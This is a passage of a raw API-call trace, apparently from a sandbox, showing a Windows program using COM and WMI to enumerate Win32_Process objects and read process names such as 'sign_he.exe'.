IUnknown:QueryInterface (in: This=0x55200c8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0264.902] IUnknown:QueryInterface (in: This=0x55200c8, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0264.902] IUnknown:QueryInterface (in: This=0x55200c8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0264.902] IUnknown:AddRef (This=0x55200c8) returned 0x3 [0264.902] IUnknown:QueryInterface (in: This=0x55200c8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0264.902] IUnknown:QueryInterface (in: This=0x55200c8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0264.902] IUnknown:QueryInterface (in: This=0x55200c8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x55200cc) returned 0x0 [0264.902] IMarshal:GetUnmarshalClass (in: This=0x55200cc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0264.902] IUnknown:Release (This=0x55200cc) returned 0x3 [0264.902] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0264.902] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0264.902] IUnknown:QueryInterface (in: This=0x55200c8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0264.902] IUnknown:Release (This=0x55200c8) returned 0x2 [0264.902] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0264.902] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0264.902] IUnknown:QueryInterface (in: This=0x55200c8, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x55200c8) returned 0x0 [0264.902] IUnknown:AddRef (This=0x55200c8) returned 0x4 [0264.903] IUnknown:Release (This=0x55200c8) returned 0x3 [0264.903] IUnknown:Release (This=0x55200c8) returned 0x2 [0264.903] CoTaskMemFree (pv=0x54ba398) [0264.903] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0264.903] IUnknown:AddRef (This=0x55200c8) returned 0x3 [0264.903] IWbemClassObject:Get (in: This=0x55200c8, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0264.903] IWbemClassObject:Get (in: This=0x55200c8, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1308\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0264.903] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1308\"") returned 0x5e [0264.903] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1308\"") returned 0x5e [0264.903] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0264.903] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0264.903] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0264.903] IUnknown:Release (This=0x601a94) returned 0x1 [0264.904] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba2d8) returned 0x0 [0264.904] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba2d8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0264.904] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba2d8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x5514ff8) returned 0x0 [0264.904] WbemDefPath:IUnknown:Release (This=0x54ba2d8) returned 0x0 [0264.904] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514ff8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x5514ff8) returned 0x0 [0264.904] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514ff8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0264.904] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514ff8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0264.905] WbemDefPath:IUnknown:AddRef (This=0x5514ff8) returned 0x3 [0264.905] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514ff8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0264.905] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514ff8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0264.905] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514ff8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x551d5f8) returned 0x0 [0264.905] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x551d5f8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0264.905] WbemDefPath:IUnknown:Release (This=0x551d5f8) returned 0x3 [0264.905] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0264.905] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0264.905] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514ff8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0264.905] WbemDefPath:IUnknown:Release (This=0x5514ff8) returned 0x2 [0264.905] WbemDefPath:IUnknown:Release (This=0x5514ff8) returned 0x1 [0264.905] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0264.905] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0264.905] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514ff8, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x5514ff8) returned 0x0 [0264.905] WbemDefPath:IUnknown:AddRef (This=0x5514ff8) returned 0x3 [0264.905] WbemDefPath:IUnknown:Release (This=0x5514ff8) returned 0x2 [0264.905] WbemDefPath:IWbemPath:SetText (This=0x5514ff8, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1308\"") returned 0x0 [0264.905] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0264.905] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0264.905] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.906] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0264.906] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0264.906] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.909] IWbemClassObject:Get (in: This=0x55200c8, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23d349c*=0, plFlavor=0x23d34a0*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="sign_he.exe", varVal2=0x0), pType=0x23d349c*=8, plFlavor=0x23d34a0*=0) returned 0x0 [0264.909] SysStringByteLen (bstr="sign_he.exe") returned 0x16 [0264.909] SysStringByteLen (bstr="sign_he.exe") returned 0x16 [0264.909] IWbemClassObject:Get (in: This=0x55200c8, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23d349c*=8, plFlavor=0x23d34a0*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="sign_he.exe", varVal2=0x0), pType=0x23d349c*=8, plFlavor=0x23d34a0*=0) returned 0x0 [0264.909] SysStringByteLen (bstr="sign_he.exe") returned 0x16 [0264.909] SysStringByteLen (bstr="sign_he.exe") returned 0x16 [0264.909] CoTaskMemAlloc (cb=0x4) returned 0x54ba2c8 [0264.909] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba2c8, puReturned=0x23c1fd0 | out: apObjects=0x54ba2c8*=0x551f5a0, puReturned=0x23c1fd0*=0x1) returned 0x0 [0264.958] IUnknown:QueryInterface (in: This=0x551f5a0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x551f5a0) returned 0x0 [0264.958] IUnknown:QueryInterface (in: This=0x551f5a0, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0264.958] IUnknown:QueryInterface (in: This=0x551f5a0, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0264.958] IUnknown:QueryInterface (in: This=0x551f5a0, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0264.958] IUnknown:AddRef (This=0x551f5a0) returned 0x3 [0264.958] IUnknown:QueryInterface (in: This=0x551f5a0, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0264.958] IUnknown:QueryInterface (in: This=0x551f5a0, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0264.958] IUnknown:QueryInterface (in: This=0x551f5a0, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x551f5a4) returned 0x0 [0264.959] IMarshal:GetUnmarshalClass (in: This=0x551f5a4, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0264.959] IUnknown:Release (This=0x551f5a4) returned 0x3 [0264.959] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0264.959] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0264.959] IUnknown:QueryInterface (in: This=0x551f5a0, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0264.959] IUnknown:Release (This=0x551f5a0) returned 0x2 [0264.959] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0264.959] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0264.959] IUnknown:QueryInterface (in: This=0x551f5a0, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x551f5a0) returned 0x0 [0264.959] IUnknown:AddRef (This=0x551f5a0) returned 0x4 [0264.960] IUnknown:Release (This=0x551f5a0) returned 0x3 [0264.960] IUnknown:Release (This=0x551f5a0) returned 0x2 [0264.960] CoTaskMemFree (pv=0x54ba2c8) [0264.960] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0264.960] IUnknown:AddRef (This=0x551f5a0) returned 0x3 [0264.960] IWbemClassObject:Get (in: This=0x551f5a0, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0264.960] IWbemClassObject:Get (in: This=0x551f5a0, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"388\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0264.960] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"388\"") returned 0x5c [0264.960] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"388\"") returned 0x5c [0264.960] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0264.961] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0264.961] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0264.961] IUnknown:Release (This=0x601a94) returned 0x1 [0264.962] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba2c8) returned 0x0 [0264.962] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba2c8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0264.963] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba2c8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x5514a48) returned 0x0 [0264.963] WbemDefPath:IUnknown:Release (This=0x54ba2c8) returned 0x0 [0264.963] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514a48, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x5514a48) returned 0x0 [0264.963] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514a48, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0264.963] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514a48, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0264.964] WbemDefPath:IUnknown:AddRef (This=0x5514a48) returned 0x3 [0264.964] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514a48, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0264.964] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514a48, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0264.964] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514a48, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x551d598) returned 0x0 [0264.964] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x551d598, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0264.964] WbemDefPath:IUnknown:Release (This=0x551d598) returned 0x3 [0264.965] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0264.965] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0264.965] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514a48, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0264.965] WbemDefPath:IUnknown:Release (This=0x5514a48) returned 0x2 [0264.965] WbemDefPath:IUnknown:Release (This=0x5514a48) returned 0x1 [0264.965] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0264.965] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0264.965] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514a48, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x5514a48) returned 0x0 [0264.965] WbemDefPath:IUnknown:AddRef (This=0x5514a48) returned 0x3 [0264.965] WbemDefPath:IUnknown:Release (This=0x5514a48) returned 0x2 [0264.965] WbemDefPath:IWbemPath:SetText (This=0x5514a48, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"388\"") returned 0x0 [0264.966] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0264.966] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0264.966] 